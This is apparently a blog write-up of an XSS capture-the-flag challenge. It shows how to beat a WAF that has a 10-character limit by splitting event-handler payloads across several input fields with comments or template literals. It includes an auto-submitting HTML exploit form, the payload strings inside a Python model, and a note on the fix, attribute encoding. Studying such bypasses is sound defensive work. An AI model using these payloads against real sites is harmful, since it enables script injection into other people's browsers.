BEST DEAL

Sunday 11 December 2016

How the WAF works?

Hi all,
One more amazing topic today, about a WAF.
The challenge has three vulnerable input tags, injectable at their value attributes (Address1, Address2, Zip).
Double quotes weren’t filtered, so the value attribute’s quotes can be closed, and the input tag can be closed using ‘>’, but you can’t open a new HTML tag using the ‘<’ character, as it was being removed. So the only possible way is to use event handlers to execute JavaScript; the problem was that all event handlers were being blocked by the WAF. However, there was a weakness in the WAF: it only blocked a payload if it exceeded 10 characters.
So a payload like “onfocus= was accepted and reflected in the response, because its length is only 9 characters:
[Image: onfocus]
But a payload like “onfocus=alert(1) was rejected and blocked by the WAF because its length is 17 characters:
[Image: onfocus-rejected]

How to bypass the WAF and execute JavaScript?

To bypass the WAF, we have to get around the 10-character length limitation. This can be done with a simple trick: splitting the XSS payload over the three affected input tags in the page. In the first vulnerable input tag you can use the shortest event handler, oncut, with a payload like “oncut=’/*, which is exactly 10 characters, and in the second vulnerable input tag you continue the rest of the payload and close the multi-line comment with */alert(1337)’, as follows.
[Image: oncut-xss]

The payload will look like the following; “Address Line 1” and “Address Line 2” act as if they were a single input tag.
[Image: oncut-xss3]
Now if you write anything inside the “Address Line 1” field and then cut it using “CTRL + X”, the XSS fires.
[Image: oncut-xss2]
This solved the challenge, but unfortunately it requires a lot of interaction from the user, and it’s hard to exploit in the real world.
Now let’s dive into more cool solutions for the challenge. I will start with my own solution :)

My Solution:

I solved the challenge with a similar technique but a different event handler, onblur, which is one character longer than oncut. So “onblur=’/* would be 11 characters and would unfortunately be blocked by the WAF. The problem now was that I needed a single character to start a comment inside the JavaScript, so that my payload length would be 10 instead of 11. Is that possible?
Luckily, yes! It’s possible thanks to ES6 (ECMAScript), which provides template strings (template literals), enclosed by back-ticks (accent grave). One feature of template strings in ES6 is multi-line strings: a template string whose source is written across two lines appears as two lines with a line break.
[Image: template-string]
So I used a template string to get the effect of a multi-line comment inside the JavaScript with one single character.
Here is the final payload I’ve used to solve the challenge:
<html>
<!-- XSS Challenge Solution:
Address Line 1: "onblur<='`
Address Line 2: `;alert(1337)'autofocus x="
Zip Code: "autofocus x=
-->
<body>
<form action="http://xss-challenge.secgeek.net/" method="POST">
<input type="hidden" name="fullname" value="" />
<input type="hidden" name="address1" value="&quot;onblur&lt;&#61;&apos;&#96;" />
<input type="hidden" name="address2" value="&#96;&#59;alert&#40;1337&#41;&apos;autofocus&#32;x&#61;&quot;" />
<input type="hidden" name="country" value="" />
<input type="hidden" name="city" value="" />
<input type="hidden" name="state" value="" />
<input type="hidden" name="zip" value="&quot;autofocus&#32;x&#61;" />
<input type="hidden" name="user&#95;selected" value="false" />
</form>
<script>document.forms[0].submit()</script>
</body>
</html>
The solution was simply to use the onblur event handler along with autofocus, as follows:
Address Line 1:
Address Line 2:
Zip Code:
The XSS payload fires when you left-click anywhere inside the page, or when you click outside the browser window, for example on the start menu or the taskbar.
[Image: XSS-Solution]
Much better, right? :) But it still needs mild interaction from the user.
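To see why the per-field length check fails and what actually closes the hole, here is an added Python model (my own example, not the challenge’s code) of the WAF as described in this post, the two split payloads from above, and a defender’s round-trip check on the rendered value attribute. The filter model, the form markup and the function names are assumptions.

```python
import html
import re

MAX_LEN = 10                                    # per-field limit described in the post
HANDLER_RE = re.compile(r"on[a-z]+\s*=", re.I)  # assumed shape of a blocked event handler

def challenge_waf_accepts(field: str) -> bool:
    """Assumed model of the challenge WAF: '<' is dropped, and a field carrying an
    event handler is rejected only when the remainder exceeds MAX_LEN characters."""
    cleaned = field.replace("<", "")
    return not (HANDLER_RE.search(cleaned) and len(cleaned) > MAX_LEN)

def strip_lt(v: str) -> str:
    """The vulnerable reflection: remove '<', echo everything else verbatim."""
    return v.replace("<", "")

def attr_encode(v: str) -> str:
    """The fix: encode for the quoted-attribute context, so '\"' can never end it."""
    return html.escape(v, quote=True)

def render(fields: dict, encode) -> str:
    """Assumed markup of the challenge form: each value sits in a double-quoted attribute."""
    return "\n".join(f'<input type="text" name="{n}" value="{encode(v)}">'
                     for n, v in fields.items())

def value_roundtrips(page: str, name: str, submitted: str) -> bool:
    """Defender's check on the rendered output: read the quoted value back and confirm it
    decodes to what was submitted. A mismatch means the input terminated the attribute
    early and the rest of it became new attributes (onblur=..., autofocus, ...)."""
    m = re.search(rf'name="{re.escape(name)}" value="([^"]*)"', page)
    return m is not None and html.unescape(m.group(1)) == submitted

def audit(fields: dict, encode) -> dict:
    """Map each field name to whether its value survived rendering intact."""
    page = render(fields, encode)
    return {n: value_roundtrips(page, n, v) for n, v in fields.items()}

# The two split payloads from the post: every fragment is within the 10-character gate,
# and the comment (oncut) or template literal (onblur) joins them across fields.
SPLIT_ONCUT = {"address1": "\"oncut='/*", "address2": "*/alert(1337)'"}
SPLIT_ONBLUR = {"address1": "\"onblur<='`",
                "address2": "`;alert(1337)'autofocus x=\"",
                "zip": "\"autofocus x="}

if __name__ == "__main__":
    for label, payload in (("oncut", SPLIT_ONCUT), ("onblur", SPLIT_ONBLUR)):
        print(label, "fragments pass WAF:", all(map(challenge_waf_accepts, payload.values())))
        print("  reflected as-is, intact?", audit(payload, strip_lt))
        print("  attribute-encoded, intact?", audit(payload, attr_encode))
```

The round-trip check is the useful part for a defender: a length gate evaluated per parameter never sees the joined payload, while encoding for the attribute context makes the split irrelevant.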
Now let’s shed light on some of the coolest solutions I’ve received that require zero user interaction.

The Solution:
Finally, the challenge was also solved with a creative payload that uses onblur and autofocus with an extra trick: the solver used window.open to open the challenge page in a new window, then redirected the window’s location to solved after 2 seconds, which makes the address1 field lose its focus, so the onblur event fires without any user interaction!
Thanks for reading the blog. Please comment below if you have any questions.
